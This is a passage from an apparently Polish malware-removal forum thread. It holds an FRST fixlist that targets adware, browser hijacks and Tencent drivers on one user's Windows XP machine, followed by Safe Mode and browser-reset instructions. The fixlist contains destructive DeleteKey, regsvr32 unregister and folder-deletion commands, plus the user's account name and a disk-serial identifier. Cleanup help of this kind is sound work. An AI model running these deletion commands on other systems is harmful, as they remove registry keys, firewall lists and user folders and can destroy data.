Task: C:\WINDOWS\Tasks\7ac4ca75-d021-44c5-ba78-4c00550bafe6-1-7.job => C:\Program Files\Object Browser\7ac4ca75-d021-44c5-ba78-4c00550bafe6-1-7.exe 
Task: C:\WINDOWS\Tasks\7ac4ca75-d021-44c5-ba78-4c00550bafe6-4.job => C:\Program Files\Object Browser\7ac4ca75-d021-44c5-ba78-4c00550bafe6-4.exe 
Task: C:\WINDOWS\Tasks\7ac4ca75-d021-44c5-ba78-4c00550bafe6-5.job => C:\Program Files\Object Browser\7ac4ca75-d021-44c5-ba78-4c00550bafe6-5.exe 
Task: C:\WINDOWS\Tasks\7ac4ca75-d021-44c5-ba78-4c00550bafe6-6.job => C:\Program Files\Object Browser\7ac4ca75-d021-44c5-ba78-4c00550bafe6-6.exe 
Task: C:\WINDOWS\Tasks\7ac4ca75-d021-44c5-ba78-4c00550bafe6-7.job => C:\Program Files\Object Browser\7ac4ca75-d021-44c5-ba78-4c00550bafe6-7.exe 
Task: C:\WINDOWS\Tasks\a4573ab7-8417-4109-8219-08f1d1efe114-1-6.job => C:\Program Files\SavePass 1.1\a4573ab7-8417-4109-8219-08f1d1efe114-1-6.exe 
Task: C:\WINDOWS\Tasks\a4573ab7-8417-4109-8219-08f1d1efe114-1-7.job => C:\Program Files\SavePass 1.1\a4573ab7-8417-4109-8219-08f1d1efe114-1-7.exe 
Task: C:\WINDOWS\Tasks\a4573ab7-8417-4109-8219-08f1d1efe114-4.job => C:\Program Files\SavePass 1.1\a4573ab7-8417-4109-8219-08f1d1efe114-4.exe 
Task: C:\WINDOWS\Tasks\a4573ab7-8417-4109-8219-08f1d1efe114-5.job => C:\Program Files\SavePass 1.1\a4573ab7-8417-4109-8219-08f1d1efe114-5.exe 
Task: C:\WINDOWS\Tasks\Advanced System~Protector.job => C:\Program Files\ASP\AspManager.exe
Task: C:\WINDOWS\Tasks\Cukoqje4zpacXzv1vzrLABj8CQG.job => C:\Documents and Settings\Krzysztof\Application Data\Cukoqje4zpacXzv1vzrLABj8CQG.exe
Task: C:\WINDOWS\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files\globalUpdate\Update\globalupdate.exe 
Task: C:\WINDOWS\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files\globalUpdate\Update\globalupdate.exe 
Task: C:\WINDOWS\Tasks\IaKVQlxEQ3T35j.job => C:\Documents and Settings\Krzysztof\Application Data\IaKVQlxEQ3T35j.exe
Task: C:\WINDOWS\Tasks\PKFkn4RDDh2SIS8ZZ.job => C:\Documents and Settings\Krzysztof\Application Data\PKFkn4RDDh2SIS8ZZ.exe
Task: C:\WINDOWS\Tasks\SimpleFiles Update Service.job => C:\Program Files\SimpleFilesUpdater\SimpleFilesUpdater.exehxxp:/simple-files.com
Task: C:\WINDOWS\Tasks\temp_50278e6d-151b-4cf5-9e8d-31ed23fbc614-10_user.job => C:\Program Files\CinemaPlus-3.2cV26.09\50278e6d-151b-4cf5-9e8d-31ed23fbc614-10.exe 
Task: C:\WINDOWS\Tasks\Xmas.job => C:\WINDOWS\system32\rundll32.exe C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Xmas\xBin\Xmas.dll
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"
HKLM\...\Run: [] => [X]
HKLM\...\Run: [ QQPCTray] => "C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCTray.exe" /regrun
HKLM\...\Run: [gmsd_pl_005010096] => [X]
HKLM\...\Run: [mbot_pl_014010096] => [X]
HKLM\...\Run: [mbot_pl_014010102] => [X]
HKLM\...\Run: [upmbot_pl_014010102.exe] => C:\Documents and Settings\Krzysztof\Local Settings\Application Data\mbot_pl_014010102\upmbot_pl_014010102.exe -runhelper
HKLM\...\Run: [sunJavaUpdateSched] => "C:\Program Files\Java\jre7\bin\jusched.exe"
HKLM\...\Winlogon: [shell] explorer.exe, [x ] ()
HKU\S-1-5-21-1960408961-682003330-839522115-1004\...\Run: [bingSvc] => C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Microsoft\BingSvc\BingSvc.exe [144008 2015-04-07] (© 2015 Microsoft Corporation)
ShellIconOverlayIdentifiers: [.QMDeskTopGCIcon] -> {B7667919-3765-4815-A66D-98A09BE662D6} => C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMGCShellExt.dll [2015-09-26] (Tencent)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
CustomCLSID: HKU\S-1-5-21-1960408961-682003330-839522115-1004_Classes\CLSID\{1FD1FE74-9E3C-4C1C-AEEB-AAB592AD770F}\localserver32 -> C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
CustomCLSID: HKU\S-1-5-21-1960408961-682003330-839522115-1004_Classes\CLSID\{5E71E4F3-E8C7-4906-9626-973E418762B6}\InprocServer32 -> C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Facebook\Update\1.2.205.0\goopdate.dll (Facebook Inc.)
CustomCLSID: HKU\S-1-5-21-1960408961-682003330-839522115-1004_Classes\CLSID\{CBE9C57E-FFA9-4123-8354-AD360D6DD3CC}\InprocServer32 -> C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
CustomCLSID: HKU\S-1-5-21-1960408961-682003330-839522115-1004_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Documents and Settings\Krzysztof\Application Data\GG\ggdrive\ggdrive-menu.dll (GG Network S.A.)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.hao123.com/?tn=95751091_hao_pg
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.oursurfing.com/?type=hp&ts=1443293666&z=a872e2bb7050c3b9111ef6agaz0zdc8o0t3c0q0q2q&from=amt&uid=hitachixhts545025b9sa02_100719pbl200csh200zvx
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1960408961-682003330-839522115-1004\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUSyDMFv8NAOf72g_52TO1Q8T9E1z2NFGDHko4e8BbYNV6e-AVbiqCN2a0fQhKzKTNQTY9Tmtm8gq3gdyIIACRX4xZCnmDTMzrVdBCl1wGaSuGqFTt2SOrkLvi9FyG4ABhng,,&q={searchTerms}
HKU\S-1-5-21-1960408961-682003330-839522115-1004\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.hao123.com/?tn=95751091_hao_pg hxxp://www.gazeta.pl/0,0.html?p=156
HKU\S-1-5-21-1960408961-682003330-839522115-1004\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.oursurfing.com/?type=hp&ts=1443293666&z=a872e2bb7050c3b9111ef6agaz0zdc8o0t3c0q0q2q&from=amt&uid=hitachixhts545025b9sa02_100719pbl200csh200zvx
HKU\S-1-5-21-1960408961-682003330-839522115-1004\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUSyDMFv8NAOf72g_52TO1Q8T9E1z2NFGDHko4e8BbYNV6e-AVbiqCN2a0fQhKzKTNQTY9Tmtm8gq3gdyIIACRX4xZCnmDTMzrVdBCl1wGaSuGqFTt2SOrkLvi9FyG4ABhng,,&q={searchTerms}
HKU\S-1-5-21-1960408961-682003330-839522115-1004\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUSyDMFv8NAOf72g_52TO1Q8T9E1z2NFGDHko4e8BbYNV6e-AVbiqCN2a0fQhKzKTNQTY9Tmtm8gq3gdyIIACRX4xZCnmDTMzrVdBCl1wGaSuGqFTt2SOrkLvi9FyG4ABhng,,&q={searchTerms}
HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURLs,Tabs: "hxxp://www.only-search.com/?babsrc=NT_kms&affID=132174" 
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUSyDMFv8NAOf72g_52TO1Q8T9E1z2NFGDHko4e8BbYNV6e-AVbiqCN2a0fQhKzKTNQTY9Tmtm8gq3gdyIIACRX4xZCnmDTMzrVdBCl1wGaSuGqFTt2SOrkLvi9FyG4ABhng,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1960408961-682003330-839522115-1004 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-1960408961-682003330-839522115-1004 -> {36D00200-6447-4870-A80F-C551B17BDE8F} URL = hxxp://www.only-search.com/?babsrc=SP_kms&affID=132174&q={searchTerms}&r=965
SearchScopes: HKU\S-1-5-21-1960408961-682003330-839522115-1004 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUSyDMFv8NAOf72g_52TO1Q8T9E1z2NFGDHko4e8BbYNV6e-AVbiqCN2a0fQhKzKTNQTY9Tmtm8gq3gdyIIACRX4xZCnmDTMzrVdBCl1wGaSuGqFTt2SOrkLvi9FyG4ABhng,,&q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FF Plugin: @staging.google.com/globalUpdate Update;version=10 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll [2015-10-29] (globalUpdate)
FF Plugin: @staging.google.com/globalUpdate Update;version=4 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll [2015-10-29] (globalUpdate)
GroupPolicy: Restriction - Chrome 
CHR HKLM\SOFTWARE\Policies\Google: Restriction 
StartMenuInternet: chrome.exe - C:\Program Files\Google\Chrome\Application\chrome.exe hxxp://www.istartsurf.com/?type=sc&ts=1443295299&z=796cc5cf51a969ca0186f3egczdz4c1odt6w6gde8t&from=face&uid=HitachiXHTS545025B9SA02_100719PBL200CSH200ZVX
Facebook Update Helper (Version: 1.2.205.0 - Google Inc.) Hidden
AV: 电脑管家系统防护 (Enabled - Up to date) {9AAC524A-BF34-49b0-91D2-71838CBB8110}
DeleteKey: HKCU\Software\Google\Chrome\Extensions
DeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions
DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox\Extensions
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Documents and Settings^Krzysztof^Start Menu^Programs^Startup^IMVU.lnk
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Documents and Settings^Krzysztof^Start Menu^Programs^Startup^Logitech . Rejestracja produktu.lnk
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Documents and Settings^Krzysztof^Start Menu^Programs^Startup^OpenOffice.org 3.2.lnk
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Documents and Settings^Krzysztof^Start Menu^Programs^Startup^OptimumLink.lnk
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Documents and Settings^Krzysztof^Start Menu^Programs^Startup^OptimumPCtoTV.lnk
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Documents and Settings^Krzysztof^Start Menu^Programs^Startup^ybcrlnsnniggidoderh.lnk
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\EvtMgr6
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GG
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Jing
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ORAHSSSessionManager
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QuickTime Task
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\TP-Link USB Printer Controller
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CinemaP-1.9cV26.09
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CinemaPlus-3.2cV26.09
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GoHD
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes
CMD: for %i in ("C:\Program Files\globalUpdate\Update\1.3.25.0\*.dll") do regsvr32 /u /s %i
CMD: for %i in ("C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\*.dll") do regsvr32 /u /s %i
C:\Documents and Settings\All Users\Application Data\2WdsManPro2
C:\Documents and Settings\All Users\Application Data\TEMP
C:\Documents and Settings\All Users\Start Menu\电脑管家.lnk
C:\Documents and Settings\All Users\Start Menu\强力卸载电脑上的软件 .lnk
C:\Documents and Settings\Gość\Favorites\Links\*.url
C:\Documents and Settings\Gość\Start Menu\7Burn.lnk
C:\Documents and Settings\Gość\Start Menu\Programs\FileZilla FTP Client
C:\Documents and Settings\Krzysztof\sqlite3.dll
C:\Documents and Settings\Krzysztof\Application Data\cTEckRNVP8
C:\Documents and Settings\Krzysztof\Application Data\Cukoqje4zpacXzv1vzrLABj8CQG
C:\Documents and Settings\Krzysztof\Application Data\IaKVQlxEQ3T35j
C:\Documents and Settings\Krzysztof\Application Data\NevoSoft Gameslog.txt
C:\Documents and Settings\Krzysztof\Application Data\PKFkn4RDDh2SIS8ZZ
C:\Documents and Settings\Krzysztof\Application Data\GG
C:\Documents and Settings\Krzysztof\Desktop\Continue kED installation.lnk
C:\Documents and Settings\Krzysztof\Favorites\Bing.url
C:\Documents and Settings\Krzysztof\Favorites\Discover Bing.url
C:\Documents and Settings\Krzysztof\Favorites\MSN Websites\MSN*.url
C:\Documents and Settings\Krzysztof\Favorites\Microsoft Websites\Microsoft Showcase.url
C:\Documents and Settings\Krzysztof\Favorites\Microsoft Websites\Microsoft.com.url
C:\Documents and Settings\Krzysztof\Favorites\Links\go.microsoft.com-fwlink-LinkId=121315.url
C:\Documents and Settings\Krzysztof\Favorites\Links\ieonline.microsoft.com-#ieslice.url
C:\Documents and Settings\Krzysztof\Favorites\Links\Suggested Sites*.url
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Planetjob.exe
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Planetjob.exe.config
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Facebook
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\globalUpdate
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\mbot_pl_014010102
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Microsoft\BingSvc
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Xmas
C:\Documents and Settings\Krzysztof\Start Menu\Programs\腾讯软件
C:\Program Files\path5.ini
C:\Program Files\5C8CAC0A-1443294427-5799-9460-C2325843CB2C
C:\Program Files\ASP
C:\Program Files\CinemaP-1.9cV26.09
C:\Program Files\CinemaPlus-3.2cV26.09
C:\Program Files\Concom
C:\Program Files\globalUpdate
C:\Program Files\GoHD
C:\Program Files\Mozilla Firefox\browser\searchplugins
C:\Program Files\Mozilla Firefox\plugins
C:\Program Files\Object Browser
C:\Program Files\RayDld
C:\Program Files\SavePass 1.1
C:\Program Files\SFK
C:\Program Files\SimpleFilesUpdater
C:\Program Files\Tencent
C:\Program Files\Common Files\Tencent
C:\WINDOWS\DUMP*.tmp
C:\WINDOWS\QMNetworkMgr.ini
C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
C:\WINDOWS\pss\McAfee Security Scan Plus.lnkCommon Startup
C:\WINDOWS\pss\IMVU.lnkStartup
C:\WINDOWS\pss\Logitech . Rejestracja produktu.lnkStartup
C:\WINDOWS\pss\OpenOffice.org 3.2.lnkStartup
C:\WINDOWS\pss\OptimumLink.lnkStartup
C:\WINDOWS\pss\OptimumPCtoTV.lnkStartup
C:\WINDOWS\pss\ybcrlnsnniggidoderh.lnkStartup
C:\WINDOWS\System32\tssk.sys
C:\WINDOWS\system32\Drivers\TAOAccelerator.sys
C:\WINDOWS\System32\Drivers\TAOKernelXP.sys
C:\WINDOWS\System32\Drivers\TFsFlt.sys
C:\WINDOWS\System32\Drivers\TsFltMgr.sys
C:\WINDOWS\System32\Drivers\TSDefenseBt.sys
Folder: C:\extensions
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files\Common Files"
CMD: dir /a "C:\Documents and Settings\All Users\Application Data"
CMD: dir /a "C:\Documents and Settings\Krzysztof\Application Data"
CMD: dir /a "C:\Documents and Settings\Krzysztof\Local Settings\Application Data"

Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8

Plik fixlist.txt i umieść obok narzędzia FRST. Przejdź w Tryb awaryjny Windows - na ekranie logowania wybierz własne konto Krzysztof a nie Administrator. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

3. Wyczyść przeglądarki z adware:

Firefox:

• Odłącz synchronizację (o ile włączona): KLIK.
• Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
• Menu Historia > Wyczyść historię przeglądania

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Ustawienia > Osoby > załóż nowy profil i się na niego zaloguj, a stary całkowicie skasuj.

Pytanie: czy można usunąć folder C:\Documents and Settings\Krzysztof\GG dysk? GG zostało odinstalowane, ale w tym folderze mogą być jakieś potrzebne pliki osobiste.

Chodzi Ci o metodę F8, czy o wchodzenia za pomocą opcji Windows? Metoda via F8 domyśnie nie działa na nowszych rozwiązaniach, start jest "zbyt szybki", by to wdrożyć. Do Trybu awaryjnego w Windows 10 dostaje się w następujący sposób:

Przycisk Start > Ustawienia > Aktualizacja i zabezpieczenia > Odzyskiwanie > Uruchamianie zaawansowane > Uruchom teraz > system zrestartuje i pojawi się ekan z opcjami > Ustawienia zaawansowane > Ustawienia uruchamiania > tu jest Tryb awaryjny.